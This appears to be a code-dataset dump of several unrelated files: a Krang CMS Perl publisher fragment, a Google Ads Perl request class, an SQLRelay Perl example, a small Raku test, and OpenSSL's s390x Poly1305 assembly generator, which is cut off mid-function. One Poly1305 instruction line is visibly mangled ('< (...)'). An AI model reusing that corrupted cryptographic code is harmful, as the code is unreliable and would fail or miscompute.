my $parents_sth = dbh()->prepare_cached($sql);
$parents_sth->execute(@parent_cat_ids);
while (my $row = $parents_sth->fetchrow_arrayref) {
my $candidate_story_id = $row->[0];
# inflate story_id value into a story object, but only if it isn't already marked for publishing
unless (exists $linked_stories{$row->[0]}) {
my ($candidate) = pkg('Story')->find(story_id => $candidate_story_id);
if($candidate->can('wont_publish') && $candidate->wont_publish()) {
debug( sprintf
__PACKAGE__
. ': skipping candidate %s object id=%s that wont_publish',
$type, (
$type eq 'story' ? $candidate->story_id
: $type eq 'media' ? $candidate->media_id
: '')
);
next;
}
# only keep if the class method should_category_linked_publish() says the candidate should be published
if (
$candidate->element->class->should_category_linked_publish(
publisher => $self,
candidate => $candidate,
object => $object,
)
)
{
$linked_stories{$candidate_story_id} = $candidate;
$self->_update_implication_map($implication_map, $object, [$candidate]);
}
}
}
}
}
}
# merge and uniquify the category-linked stories into the publish list
my (@publish_list, %seen);
for my $object (@$publish_list, values(%linked_stories)) {
next unless $object;
my $meth = $object->isa('Krang::Story') ? 'story_id' : 'media_id';
push @publish_list, $object
unless $seen{$meth}{$object->$meth}++;
debug(__PACKAGE__.'::_add_category_linked_stories() adding ' . $meth . ' ' . $object->$meth);
}
return \@publish_list;
}
sub what_are_my_category_linked_stories {
my ($self, $story_id_list) = @_;
my $publish_list = [];
my %seen_story_ids;
# inflate into objects
foreach my $story_id (@{$story_id_list}) {
my ($story) = pkg('Story')->find(story_id => $story_id);
push @{$publish_list}, $story;
$seen_story_ids{$story_id}++;
}
my $before_count = scalar @{$publish_list};
$publish_list = $self->_add_category_linked_stories($publish_list);
my $after_count = scalar @{$publish_list};
# no linked stories added to the list
return unless ($after_count > $before_count);
# keep a list of the new story_id values
my %new_story_ids;
foreach my $story (@{$publish_list}) {
my $story_id = $story->story_id;
$new_story_ids{$story_id}++
unless ($seen_story_ids{$story_id});
}
debug(sprintf __PACKAGE__ . '::what_are_my_category_linked_stories() [%s]',
join(',', keys(%new_story_ids)));
return [keys(%new_story_ids)];
}
############################################################
#
# MODES -
#
# The internal hash keys is_preview and is_publish are checked in a lot of places,
# so these quick subroutines cut down on issues.
#
sub _set_preview_mode {
my $self = shift;
$self->{is_preview} = 1;
$self->{is_publish} = 0;
}
sub _set_publish_mode {
my $self = shift;
$self->{is_preview} = 0;
$self->{is_publish} = 1;
}
my $EBN = <<EOEBN;
This is a test of the emergency broadcast network.
Please stand by and await further instructions.
EOEBN
| 30.888571 | 235 | 0.612328 |
ed7eae89d3f397492fc36da81f093c814239f613 | 1,049 | pm | Perl | lib/Google/Ads/GoogleAds/V3/Services/CampaignService/GetCampaignRequest.pm | PierrickVoulet/google-ads-perl | bc9fa2de22aa3e11b99dc22251d90a1723dd8cc4 | [
"Apache-2.0"
] | null | null | null | lib/Google/Ads/GoogleAds/V3/Services/CampaignService/GetCampaignRequest.pm | PierrickVoulet/google-ads-perl | bc9fa2de22aa3e11b99dc22251d90a1723dd8cc4 | [
"Apache-2.0"
] | null | null | null | lib/Google/Ads/GoogleAds/V3/Services/CampaignService/GetCampaignRequest.pm | PierrickVoulet/google-ads-perl | bc9fa2de22aa3e11b99dc22251d90a1723dd8cc4 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020, Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
package Google::Ads::GoogleAds::V3::Services::CampaignService::GetCampaignRequest;
use strict;
use warnings;
use base qw(Google::Ads::GoogleAds::BaseEntity);
use Google::Ads::GoogleAds::Utils::GoogleAdsHelper;
sub new {
my ($class, $args) = @_;
my $self = {resourceName => $args->{resourceName}};
# Delete the unassigned fields in this object for a more concise JSON payload
remove_unassigned_fields($self, $args);
bless $self, $class;
return $self;
}
1;
| 29.971429 | 82 | 0.739752 |
ed05f398c069f4bbefd038b43ce839f2ecf06501 | 535 | pl | Perl | doc/programming/parts/perl-reexecute.pl | cryptoboxcomics/sqlrelay-1.6.0_amber | bda2d52edeb6afb25744b22e2841b105b1e4cd01 | [
"PHP-3.01",
"CC-BY-3.0"
] | 16 | 2018-04-23T09:58:33.000Z | 2022-01-31T13:40:20.000Z | doc/programming/parts/perl-reexecute.pl | cryptoboxcomics/sqlrelay-1.6.0_amber | bda2d52edeb6afb25744b22e2841b105b1e4cd01 | [
"PHP-3.01",
"CC-BY-3.0"
] | null | null | null | doc/programming/parts/perl-reexecute.pl | cryptoboxcomics/sqlrelay-1.6.0_amber | bda2d52edeb6afb25744b22e2841b105b1e4cd01 | [
"PHP-3.01",
"CC-BY-3.0"
] | 4 | 2020-12-23T12:17:54.000Z | 2022-01-04T20:46:34.000Z | use SQLRelay::Connection;
use SQLRelay::Cursor;
$con=SQLRelay::Connection->new("sqlrserver",9000,"/tmp/example.socket","user","password",0,1);
$cur=SQLRelay::Cursor->new($con);
$cur->prepareQuery("select * from mytable where mycolumn>:value");
$cur->inputBind("value",1);
$cur->executeQuery();
... process the result set ...
$cur->clearBinds();
$cur->inputBind("value",5);
$cur->executeQuery();
... process the result set ...
$cur->clearBinds();
$cur->inputBind("value",10);
$cur->executeQuery();
... process the result set ...
| 22.291667 | 94 | 0.676636 |
ed9b32cb37224dec1191e4d7195653e4b9c48cdb | 73 | t | Perl | t/01-basic.t | moznion/panda-watcher | 8b7dc6a7eab0719d1c76e6a1fed9d3d7dab9aad1 | [
"Artistic-2.0"
] | null | null | null | t/01-basic.t | moznion/panda-watcher | 8b7dc6a7eab0719d1c76e6a1fed9d3d7dab9aad1 | [
"Artistic-2.0"
] | null | null | null | t/01-basic.t | moznion/panda-watcher | 8b7dc6a7eab0719d1c76e6a1fed9d3d7dab9aad1 | [
"Artistic-2.0"
] | null | null | null | use v6;
use Test;
use panda::watcher;
pass "replace me";
done-testing;
| 9.125 | 19 | 0.69863 |
73efdd9e6d5c797d3a90d58dfa87a4976b40d67d | 24,453 | pl | Perl | crypto/poly1305/asm/poly1305-s390x.pl | JemmyLoveJenny/openssl | f8922b5107d098c78f846c8c999f96111345de8d | [
"Apache-2.0"
] | 2 | 2019-07-29T08:08:47.000Z | 2019-07-29T08:08:51.000Z | crypto/poly1305/asm/poly1305-s390x.pl | JemmyLoveJenny/openssl | f8922b5107d098c78f846c8c999f96111345de8d | [
"Apache-2.0"
] | 2 | 2020-11-05T14:41:39.000Z | 2021-08-11T20:29:26.000Z | crypto/poly1305/asm/poly1305-s390x.pl | JemmyLoveJenny/openssl | f8922b5107d098c78f846c8c999f96111345de8d | [
"Apache-2.0"
] | 1 | 2019-07-14T17:25:17.000Z | 2019-07-14T17:25:17.000Z | #! /usr/bin/env perl
# Copyright 2016 The OpenSSL Project Authors. All Rights Reserved.
#
# Licensed under the Apache License 2.0 (the "License"). You may not use
# this file except in compliance with the License. You can obtain a copy
# in the file LICENSE in the source distribution or at
# https://www.openssl.org/source/license.html
#
# ====================================================================
# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
# project. The module is, however, dual licensed under OpenSSL and
# CRYPTOGAMS licenses depending on where you obtain it. For further
# details see http://www.openssl.org/~appro/cryptogams/.
# ====================================================================
#
# This module implements Poly1305 hash for s390x.
#
# June 2015
#
# ~6.6/2.3 cpb on z10/z196+, >2x improvement over compiler-generated
# code. For older compiler improvement coefficient is >3x, because
# then base 2^64 and base 2^32 implementations are compared.
#
# On side note, z13 enables vector base 2^26 implementation...
#
# January 2019
#
# Add vx code path (base 2^26).
#
# Copyright IBM Corp. 2019
# Author: Patrick Steuer <patrick.steuer@de.ibm.com>
#
# January 2019
#
# Add vector base 2^26 implementation. It's problematic to accurately
# measure performance, because the reference system is hardly idle. But
# it's sub-cycle, i.e. less than 1 cycle per processed byte, and it's
# >=20% faster than IBM's submission on long inputs, and much faster on
# short ones, because calculation of key powers is postponed till we
# know that input is long enough to justify the additional overhead.
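#
# As a quick sketch of the representation: the base 2^26 code below keeps
# the 130-bit accumulator h in five 26-bit limbs,
#
#     h = h0 + h1*2^26 + h2*2^52 + h3*2^78 + h4*2^104,  0 <= hi < 2^26
#
# so that 26x26-bit limb products and their accumulated sums fit in the
# 64-bit lanes produced by vmlof/vmalof.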
use strict;
use FindBin qw($Bin);
use lib "$Bin/../..";
use perlasm::s390x qw(:DEFAULT :LD :GE :EI :MI1 :VX AUTOLOAD LABEL INCLUDE);
my $flavour = shift;
my ($z,$SIZE_T);
if ($flavour =~ /3[12]/) {
$z=0; # S/390 ABI
$SIZE_T=4;
} else {
$z=1; # zSeries ABI
$SIZE_T=8;
}
my $output;
while (($output=shift) && ($output!~/\w[\w\-]*\.\w+$/)) {}
my $stdframe=16*$SIZE_T+4*8;
my $sp="%r15";
my ($ctx,$inp,$len,$padbit) = map("%r$_",(2..5));
PERLASM_BEGIN($output);
INCLUDE ("s390x_arch.h");
TEXT ();
################
# static void poly1305_init(void *ctx, const unsigned char key[16])
{
GLOBL ("poly1305_init");
TYPE ("poly1305_init","\@function");
ALIGN (16);
LABEL ("poly1305_init");
lghi ("%r0",0);
lghi ("%r1",-1);
stg ("%r0","0($ctx)"); # zero hash value
stg ("%r0","8($ctx)");
stg ("%r0","16($ctx)");
st ("%r0","24($ctx)"); # clear is_base2_26
lgr ("%r5",$ctx); # reassign $ctx
lghi ("%r2",0);
&{$z? \&clgr:\&clr} ($inp,"%r0");
je (".Lno_key");
lrvg ("%r2","0($inp)"); # load little-endian key
lrvg ("%r3","8($inp)");
nihl ("%r1",0xffc0); # 0xffffffc0ffffffff
srlg ("%r0","%r1",4); # 0x0ffffffc0fffffff
srlg ("%r1","%r1",4);
nill ("%r1",0xfffc); # 0x0ffffffc0ffffffc
ngr ("%r2","%r0");
ngr ("%r3","%r1");
stmg ("%r2","%r3","32(%r5)");
larl ("%r1","OPENSSL_s390xcap_P");
lg ("%r0","16(%r1)");
srlg ("%r0","%r0",62);
nill ("%r0",1); # extract vx bit
lcgr ("%r0","%r0");
larl ("%r1",".Lpoly1305_blocks");
larl ("%r2",".Lpoly1305_blocks_vx");
larl ("%r3",".Lpoly1305_emit");
&{$z? \&xgr:\&xr} ("%r2","%r1"); # select between scalar and vector
&{$z? \&ngr:\&nr} ("%r2","%r0");
&{$z? \&xgr:\&xr} ("%r2","%r1");
&{$z? \&stmg:\&stm} ("%r2","%r3","0(%r4)");
lghi ("%r2",1);
LABEL (".Lno_key");
br ("%r14");
SIZE ("poly1305_init",".-poly1305_init");
}
################
# static void poly1305_blocks(void *ctx, const unsigned char *inp,
# size_t len, u32 padbit)
{
my ($d0hi,$d0lo,$d1hi,$d1lo,$t0,$h0,$t1,$h1,$h2) = map("%r$_",(6..14));
my ($r0,$r1,$s1) = map("%r$_",(0..2));
GLOBL ("poly1305_blocks");
TYPE ("poly1305_blocks","\@function");
ALIGN (16);
LABEL ("poly1305_blocks");
LABEL (".Lpoly1305_blocks");
&{$z? \&ltgr:\&ltr} ("%r0",$len);
jz (".Lno_data");
&{$z? \&stmg:\&stm} ("%r6","%r14","6*$SIZE_T($sp)");
lg ($h0,"0($ctx)"); # load hash value
lg ($h1,"8($ctx)");
lg ($h2,"16($ctx)");
LABEL (".Lpoly1305_blocks_entry");
if ($z) {
srlg ($len,$len,4);
} else {
srl ($len,4);
}
llgfr ($padbit,$padbit); # clear upper half, much needed with
# non-64-bit ABI
lg ($r0,"32($ctx)"); # load key
lg ($r1,"40($ctx)");
&{$z? \&stg:\&st} ($ctx,"2*$SIZE_T($sp)"); # off-load $ctx
srlg ($s1,$r1,2);
algr ($s1,$r1); # s1 = r1 + r1>>2
j (".Loop");
ALIGN (16);
LABEL (".Loop");
lrvg ($d0lo,"0($inp)"); # load little-endian input
lrvg ($d1lo,"8($inp)");
la ($inp,"16($inp)");
algr ($d0lo,$h0); # accumulate input
alcgr ($d1lo,$h1);
alcgr ($h2,$padbit);
lgr ($h0,$d0lo);
mlgr ($d0hi,$r0); # h0*r0 -> $d0hi:$d0lo
lgr ($h1,$d1lo);
mlgr ($d1hi,$s1); # h1*5*r1 -> $d1hi:$d1lo
mlgr ($t0,$r1); # h0*r1 -> $t0:$h0
mlgr ($t1,$r0); # h1*r0 -> $t1:$h1
algr ($d0lo,$d1lo);
lgr ($d1lo,$h2);
alcgr ($d0hi,$d1hi);
lghi ($d1hi,0);
algr ($h1,$h0);
alcgr ($t1,$t0);
msgr ($d1lo,$s1); # h2*s1
msgr ($h2,$r0); # h2*r0
algr ($h1,$d1lo);
alcgr ($t1,$d1hi); # $d1hi is zero
algr ($h1,$d0hi);
alcgr ($h2,$t1);
lghi ($h0,-4); # final reduction step
ngr ($h0,$h2);
srlg ($t0,$h2,2);
algr ($h0,$t0);
lghi ($t1,3);
ngr ($h2,$t1);
algr ($h0,$d0lo);
alcgr ($h1,$d1hi); # $d1hi is still zero
alcgr ($h2,$d1hi); # $d1hi is still zero
&{$z? \&brctg:\&brct} ($len,".Loop");
&{$z? \&lg:\&l} ($ctx,"2*$SIZE_T($sp)");# restore $ctx
stg ($h0,"0($ctx)"); # store hash value
stg ($h1,"8($ctx)");
stg ($h2,"16($ctx)");
&{$z? \&lmg:\&lm} ("%r6","%r14","6*$SIZE_T($sp)");
LABEL (".Lno_data");
br ("%r14");
SIZE ("poly1305_blocks",".-poly1305_blocks");
}
################
# static void poly1305_blocks_vx(void *ctx, const unsigned char *inp,
# size_t len, u32 padbit)
{
my ($H0, $H1, $H2, $H3, $H4) = map("%v$_",(0..4));
my ($I0, $I1, $I2, $I3, $I4) = map("%v$_",(5..9));
my ($R0, $R1, $S1, $R2, $S2) = map("%v$_",(10..14));
my ($R3, $S3, $R4, $S4) = map("%v$_",(15..18));
my ($ACC0, $ACC1, $ACC2, $ACC3, $ACC4) = map("%v$_",(19..23));
my ($T1, $T2, $T3, $T4) = map("%v$_",(24..27));
my ($mask26,$bswaplo,$bswaphi,$bswapmi) = map("%v$_",(28..31));
my ($d2,$d0,$h0,$d1,$h1,$h2)=map("%r$_",(9..14));
TYPE ("poly1305_blocks_vx","\@function");
ALIGN (16);
LABEL ("poly1305_blocks_vx");
LABEL (".Lpoly1305_blocks_vx");
&{$z? \&clgfi:\&clfi} ($len,128);
jhe ("__poly1305_blocks_vx");
&{$z? \&stmg:\&stm} ("%r6","%r14","6*$SIZE_T($sp)");
lg ($d0,"0($ctx)");
lg ($d1,"8($ctx)");
lg ($d2,"16($ctx)");
llgfr ("%r0",$d0); # base 2^26 -> base 2^64
srlg ($h0,$d0,32);
llgfr ("%r1",$d1);
srlg ($h1,$d1,32);
srlg ($h2,$d2,32);
sllg ("%r0","%r0",26);
algr ($h0,"%r0");
sllg ("%r0",$h1,52);
srlg ($h1,$h1,12);
sllg ("%r1","%r1",14);
algr ($h0,"%r0");
alcgr ($h1,"%r1");
sllg ("%r0",$h2,40);
srlg ($h2,$h2,24);
lghi ("%r1",0);
algr ($h1,"%r0");
alcgr ($h2,"%r1");
llgf ("%r0","24($ctx)"); # is_base2_26
lcgr ("%r0","%r0");
xgr ($h0,$d0); # choose between radixes
xgr ($h1,$d1);
xgr ($h2,$d2);
ngr ($h0,"%r0");
ngr ($h1,"%r0");
ngr ($h2,"%r0");
xgr ($h0,$d0);
xgr ($h1,$d1);
xgr ($h2,$d2);
lhi ("%r0",0);
st ("%r0","24($ctx)"); # clear is_base2_26
j (".Lpoly1305_blocks_entry");
SIZE ("poly1305_blocks_vx",".-poly1305_blocks_vx");
TYPE ("__poly1305_mul","\@function");
ALIGN (16);
LABEL ("__poly1305_mul");
vmlof ($ACC0,$H0,$R0);
vmlof ($ACC1,$H0,$R1);
vmlof ($ACC2,$H0,$R2);
vmlof ($ACC3,$H0,$R3);
vmlof ($ACC4,$H0,$R4);
vmalof ($ACC0,$H1,$S4,$ACC0);
vmalof ($ACC1,$H1,$R0,$ACC1);
vmalof ($ACC2,$H1,$R1,$ACC2);
vmalof ($ACC3,$H1,$R2,$ACC3);
vmalof ($ACC4,$H1,$R3,$ACC4);
vmalof ($ACC0,$H2,$S3,$ACC0);
vmalof ($ACC1,$H2,$S4,$ACC1);
vmalof ($ACC2,$H2,$R0,$ACC2);
vmalof ($ACC3,$H2,$R1,$ACC3);
vmalof ($ACC4,$H2,$R2,$ACC4);
vmalof ($ACC0,$H3,$S2,$ACC0);
vmalof ($ACC1,$H3,$S3,$ACC1);
vmalof ($ACC2,$H3,$S4,$ACC2);
vmalof ($ACC3,$H3,$R0,$ACC3);
vmalof ($ACC4,$H3,$R1,$ACC4);
vmalof ($ACC0,$H4,$S1,$ACC0);
vmalof ($ACC1,$H4,$S2,$ACC1);
vmalof ($ACC2,$H4,$S3,$ACC2);
vmalof ($ACC3,$H4,$S4,$ACC3);
vmalof ($ACC4,$H4,$R0,$ACC4);
################################################################
# lazy reduction
vesrlg ($H4,$ACC3,26);
vesrlg ($H1,$ACC0,26);
vn ($H3,$ACC3,$mask26);
vn ($H0,$ACC0,$mask26);
vag ($H4,$H4,$ACC4); # h3 -> h4
vag ($H1,$H1,$ACC1); # h0 -> h1
vesrlg ($ACC4,$H4,26);
vesrlg ($ACC1,$H1,26);
vn ($H4,$H4,$mask26);
vn ($H1,$H1,$mask26);
vag ($H0,$H0,$ACC4);
vag ($H2,$ACC2,$ACC1); # h1 -> h2
veslg ($ACC4,$ACC4,2); # <<2
vesrlg ($ACC2,$H2,26);
vn ($H2,$H2,$mask26);
vag ($H0,$H0,$ACC4); # h4 -> h0
vag ($H3,$H3,$ACC2); # h2 -> h3
vesrlg ($ACC0,$H0,26);
vesrlg ($ACC3,$H3,26);
vn ($H0,$H0,$mask26);
vn ($H3,$H3,$mask26);
vag ($H1,$H1,$ACC0); # h0 -> h1
vag ($H4,$H4,$ACC3); # h3 -> h4
br ("%r14");
SIZE ("__poly1305_mul",".-__poly1305_mul");
TYPE ("__poly1305_blocks_vx","\@function");
ALIGN (16);
LABEL ("__poly1305_blocks_vx");
&{$z? \&lgr:\&lr} ("%r0",$sp);
&{$z? \&stmg:\&stm} ("%r10","%r15","10*$SIZE_T($sp)");
if (!$z) {
std ("%f4","16*$SIZE_T+2*8($sp)");
std ("%f6","16*$SIZE_T+3*8($sp)");
ahi ($sp,-$stdframe);
st ("%r0","0($sp)"); # back-chain
llgfr ($len,$len); # so that srlg works on $len
} else {
aghi ($sp,"-($stdframe+8*8)");
stg ("%r0","0($sp)"); # back-chain
std ("%f8","$stdframe+0*8($sp)");
std ("%f9","$stdframe+1*8($sp)");
std ("%f10","$stdframe+2*8($sp)");
std ("%f11","$stdframe+3*8($sp)");
std ("%f12","$stdframe+4*8($sp)");
std ("%f13","$stdframe+5*8($sp)");
std ("%f14","$stdframe+6*8($sp)");
std ("%f15","$stdframe+7*8($sp)");
}
larl ("%r1",".Lconst");
vgmg ($mask26,38,63);
vlm ($bswaplo,$bswapmi,"16(%r1)");
< ("%r0","24($ctx)"); # is_base2_26?
jnz (".Lskip_init");
lg ($h0,"32($ctx)"); # load key base 2^64
lg ($h1,"40($ctx)");
risbg ($d0,$h0,38,0x80+63,38); # base 2^64 -> 2^26
srlg ($d1,$h0,52);
risbg ($h0,$h0,38,0x80+63,0);
vlvgg ($R0,$h0,0);
risbg ($d1,$h1,38,51,12);
vlvgg ($R1,$d0,0);
risbg ($d0,$h1,38,63,50);
vlvgg ($R2,$d1,0);
srlg ($d1,$h1,40);
vlvgg ($R3,$d0,0);
vlvgg ($R4,$d1,0);
veslg ($S1,$R1,2);
veslg ($S2,$R2,2);
veslg ($S3,$R3,2);
veslg ($S4,$R4,2);
vlr ($H0,$R0);
vlr ($H1,$R1);
vlr ($H2,$R2);
vlr ($H3,$R3);
vlr ($H4,$R4);
vag ($S1,$S1,$R1); # * 5
vag ($S2,$S2,$R2);
vag ($S3,$S3,$R3);
vag ($S4,$S4,$R4);
brasl ("%r14","__poly1305_mul"); # r^1:- * r^1:-
vpdi ($R0,$H0,$R0,0); # r^2:r^1
vpdi ($R1,$H1,$R1,0);
vpdi ($R2,$H2,$R2,0);
vpdi ($R3,$H3,$R3,0);
vpdi ($R4,$H4,$R4,0);
vpdi ($H0,$H0,$H0,0); # r^2:r^2
vpdi ($H1,$H1,$H1,0);
vpdi ($H2,$H2,$H2,0);
vpdi ($H3,$H3,$H3,0);
vpdi ($H4,$H4,$H4,0);
veslg ($S1,$R1,2);
veslg ($S2,$R2,2);
veslg ($S3,$R3,2);
veslg ($S4,$R4,2);
vag ($S1,$S1,$R1); # * 5
vag ($S2,$S2,$R2);
vag ($S3,$S3,$R3);
vag ($S4,$S4,$R4);
brasl ("%r14,__poly1305_mul"); # r^2:r^2 * r^2:r^1
vl ($I0,"0(%r1)"); # borrow $I0
vperm ($R0,$R0,$H0,$I0); # r^2:r^4:r^1:r^3
vperm ($R1,$R1,$H1,$I0);
vperm ($R2,$R2,$H2,$I0);
vperm ($R3,$R3,$H3,$I0);
vperm ($R4,$R4,$H4,$I0);
veslf ($S1,$R1,2);
veslf ($S2,$R2,2);
veslf ($S3,$R3,2);
veslf ($S4,$R4,2);
vaf ($S1,$S1,$R1); # * 5
vaf ($S2,$S2,$R2);
vaf ($S3,$S3,$R3);
vaf ($S4,$S4,$R4);
lg ($h0,"0($ctx)"); # load hash base 2^64
lg ($h1,"8($ctx)");
lg ($h2,"16($ctx)");
vzero ($H0);
vzero ($H1);
vzero ($H2);
vzero ($H3);
vzero ($H4);
risbg ($d0,$h0,38,0x80+63,38); # base 2^64 -> 2^26
srlg ($d1,$h0,52);
risbg ($h0,$h0,38,0x80+63,0);
vlvgg ($H0,$h0,0);
risbg ($d1,$h1,38,51,12);
vlvgg ($H1,$d0,0);
risbg ($d0,$h1,38,63,50);
vlvgg ($H2,$d1,0);
srlg ($d1,$h1,40);
vlvgg ($H3,$d0,0);
risbg ($d1,$h2,37,39,24);
vlvgg ($H4,$d1,0);
lhi ("%r0",1);
st ("%r0","24($ctx)"); # set is_base2_26
vstm ($R0,$S4,"48($ctx)"); # save key schedule base 2^26
vpdi ($R0,$R0,$R0,0); # broadcast r^2:r^4
vpdi ($R1,$R1,$R1,0);
vpdi ($S1,$S1,$S1,0);
vpdi ($R2,$R2,$R2,0);
vpdi ($S2,$S2,$S2,0);
vpdi ($R3,$R3,$R3,0);
vpdi ($S3,$S3,$S3,0);
vpdi ($R4,$R4,$R4,0);
vpdi ($S4,$S4,$S4,0);
j (".Loaded_hash");
ALIGN (16);
LABEL (".Lskip_init");
vllezf ($H0,"0($ctx)"); # load hash base 2^26
vllezf ($H1,"4($ctx)");
vllezf ($H2,"8($ctx)");
vllezf ($H3,"12($ctx)");
vllezf ($H4,"16($ctx)");
vlrepg ($R0,"0x30($ctx)"); # broadcast r^2:r^4
vlrepg ($R1,"0x40($ctx)");
vlrepg ($S1,"0x50($ctx)");
vlrepg ($R2,"0x60($ctx)");
vlrepg ($S2,"0x70($ctx)");
vlrepg ($R3,"0x80($ctx)");
vlrepg ($S3,"0x90($ctx)");
vlrepg ($R4,"0xa0($ctx)");
vlrepg ($S4,"0xb0($ctx)");
LABEL (".Loaded_hash");
vzero ($I1);
vzero ($I3);
vlm ($T1,$T4,"0x00($inp)"); # load first input block
la ($inp,"0x40($inp)");
vgmg ($mask26,6,31);
vgmf ($I4,5,5); # padbit<<2
vperm ($I0,$T3,$T4,$bswaplo);
vperm ($I2,$T3,$T4,$bswapmi);
vperm ($T3,$T3,$T4,$bswaphi);
verimg ($I1,$I0,$mask26,6); # >>26
veslg ($I0,$I0,32);
veslg ($I2,$I2,28); # >>4
verimg ($I3,$T3,$mask26,18); # >>14
verimg ($I4,$T3,$mask26,58); # >>38
vn ($I0,$I0,$mask26);
vn ($I2,$I2,$mask26);
vesrlf ($I4,$I4,2); # >>2
vgmg ($mask26,38,63);
vperm ($T3,$T1,$T2,$bswaplo);
vperm ($T4,$T1,$T2,$bswaphi);
vperm ($T2,$T1,$T2,$bswapmi);
verimg ($I0,$T3,$mask26,0);
verimg ($I1,$T3,$mask26,38); # >>26
verimg ($I2,$T2,$mask26,60); # >>4
verimg ($I3,$T4,$mask26,50); # >>14
vesrlg ($T4,$T4,40);
vo ($I4,$I4,$T4);
srlg ("%r0",$len,6);
&{$z? \&aghi:\&ahi} ("%r0",-1);
ALIGN (16);
LABEL (".Loop_vx");
vmlef ($ACC0,$I0,$R0);
vmlef ($ACC1,$I0,$R1);
vmlef ($ACC2,$I0,$R2);
vmlef ($ACC3,$I0,$R3);
vmlef ($ACC4,$I0,$R4);
vmalef ($ACC0,$I1,$S4,$ACC0);
vmalef ($ACC1,$I1,$R0,$ACC1);
vmalef ($ACC2,$I1,$R1,$ACC2);
vmalef ($ACC3,$I1,$R2,$ACC3);
vmalef ($ACC4,$I1,$R3,$ACC4);
vaf ($H2,$H2,$I2);
vaf ($H0,$H0,$I0);
vaf ($H3,$H3,$I3);
vaf ($H1,$H1,$I1);
vaf ($H4,$H4,$I4);
vmalef ($ACC0,$I2,$S3,$ACC0);
vmalef ($ACC1,$I2,$S4,$ACC1);
vmalef ($ACC2,$I2,$R0,$ACC2);
vmalef ($ACC3,$I2,$R1,$ACC3);
vmalef ($ACC4,$I2,$R2,$ACC4);
vlm ($T1,$T4,"0x00($inp)"); # load next input block
la ($inp,"0x40($inp)");
vgmg ($mask26,6,31);
vmalef ($ACC0,$I3,$S2,$ACC0);
vmalef ($ACC1,$I3,$S3,$ACC1);
vmalef ($ACC2,$I3,$S4,$ACC2);
vmalef ($ACC3,$I3,$R0,$ACC3);
vmalef ($ACC4,$I3,$R1,$ACC4);
vperm ($I0,$T3,$T4,$bswaplo);
vperm ($I2,$T3,$T4,$bswapmi);
vperm ($T3,$T3,$T4,$bswaphi);
vmalef ($ACC0,$I4,$S1,$ACC0);
vmalef ($ACC1,$I4,$S2,$ACC1);
vmalef ($ACC2,$I4,$S3,$ACC2);
vmalef ($ACC3,$I4,$S4,$ACC3);
vmalef ($ACC4,$I4,$R0,$ACC4);
verimg ($I1,$I0,$mask26,6); # >>26
veslg ($I0,$I0,32);
veslg ($I2,$I2,28); # >>4
verimg ($I3,$T3,$mask26,18); # >>14
vmalof ($ACC0,$H0,$R0,$ACC0);
vmalof ($ACC1,$H0,$R1,$ACC1);
vmalof ($ACC2,$H0,$R2,$ACC2);
vmalof ($ACC3,$H0,$R3,$ACC3);
vmalof ($ACC4,$H0,$R4,$ACC4);
vgmf ($I4,5,5); # padbit<<2
verimg ($I4,$T3,$mask26,58); # >>38
vn ($I0,$I0,$mask26);
vn ($I2,$I2,$mask26);
vesrlf ($I4,$I4,2); # >>2
vmalof ($ACC0,$H1,$S4,$ACC0);
vmalof ($ACC1,$H1,$R0,$ACC1);
vmalof ($ACC2,$H1,$R1,$ACC2);
vmalof ($ACC3,$H1,$R2,$ACC3);
vmalof ($ACC4,$H1,$R3,$ACC4);
vgmg ($mask26,38,63);
vperm ($T3,$T1,$T2,$bswaplo);
vperm ($T4,$T1,$T2,$bswaphi);
vperm ($T2,$T1,$T2,$bswapmi);
vmalof ($ACC0,$H2,$S3,$ACC0);
vmalof ($ACC1,$H2,$S4,$ACC1);
vmalof ($ACC2,$H2,$R0,$ACC2);
vmalof ($ACC3,$H2,$R1,$ACC3);
vmalof ($ACC4,$H2,$R2,$ACC4);
verimg ($I0,$T3,$mask26,0);
verimg ($I1,$T3,$mask26,38); # >>26
verimg ($I2,$T2,$mask26,60); # >>4
vmalof ($ACC0,$H3,$S2,$ACC0);
vmalof ($ACC1,$H3,$S3,$ACC1);
vmalof ($ACC2,$H3,$S4,$ACC2);
vmalof ($ACC3,$H3,$R0,$ACC3);
vmalof ($ACC4,$H3,$R1,$ACC4);
verimg ($I3,$T4,$mask26,50); # >>14
vesrlg ($T4,$T4,40);
vo ($I4,$I4,$T4);
vmalof ($ACC0,$H4,$S1,$ACC0);
vmalof ($ACC1,$H4,$S2,$ACC1);
vmalof ($ACC2,$H4,$S3,$ACC2);
vmalof ($ACC3,$H4,$S4,$ACC3);
vmalof ($ACC4,$H4,$R0,$ACC4);
################################################################
# lazy reduction as discussed in "NEON crypto" by D.J. Bernstein
# and P. Schwabe
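# Digits are allowed to grow somewhat beyond 26 bits while products
# are accumulated; the single carry pass below brings each digit back
# to roughly 26 bits without reducing fully modulo 2^130-5. A carry
# out of the top digit has weight 2^130 == 5 (mod 2^130-5), which is
# why it is folded into H0 as c + 4*c (the vag/veslg pair on $ACC4).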
vesrlg ($H4,$ACC3,26);
vesrlg ($H1,$ACC0,26);
vn ($H3,$ACC3,$mask26);
vn ($H0,$ACC0,$mask26);
vag ($H4,$H4,$ACC4); # h3 -> h4
vag ($H1,$H1,$ACC1); # h0 -> h1
vesrlg ($ACC4,$H4,26);
vesrlg ($ACC1,$H1,26);
vn ($H4,$H4,$mask26);
vn ($H1,$H1,$mask26);
vag ($H0,$H0,$ACC4);
vag ($H2,$ACC2,$ACC1); # h1 -> h2
veslg ($ACC4,$ACC4,2); # <<2
vesrlg ($ACC2,$H2,26);
vn ($H2,$H2,$mask26);
vag ($H0,$H0,$ACC4); # h4 -> h0
vag ($H3,$H3,$ACC2); # h2 -> h3
vesrlg ($ACC0,$H0,26);
vesrlg ($ACC3,$H3,26);
vn ($H0,$H0,$mask26);
vn ($H3,$H3,$mask26);
vag ($H1,$H1,$ACC0); # h0 -> h1
vag ($H4,$H4,$ACC3); # h3 -> h4
&{$z? \&brctg:\&brct} ("%r0",".Loop_vx");
vlm ($R0,$S4,"48($ctx)"); # load all powers
lghi ("%r0",0x30);
&{$z? \&lcgr:\&lcr} ($len,$len);
&{$z? \&ngr:\&nr} ($len,"%r0");
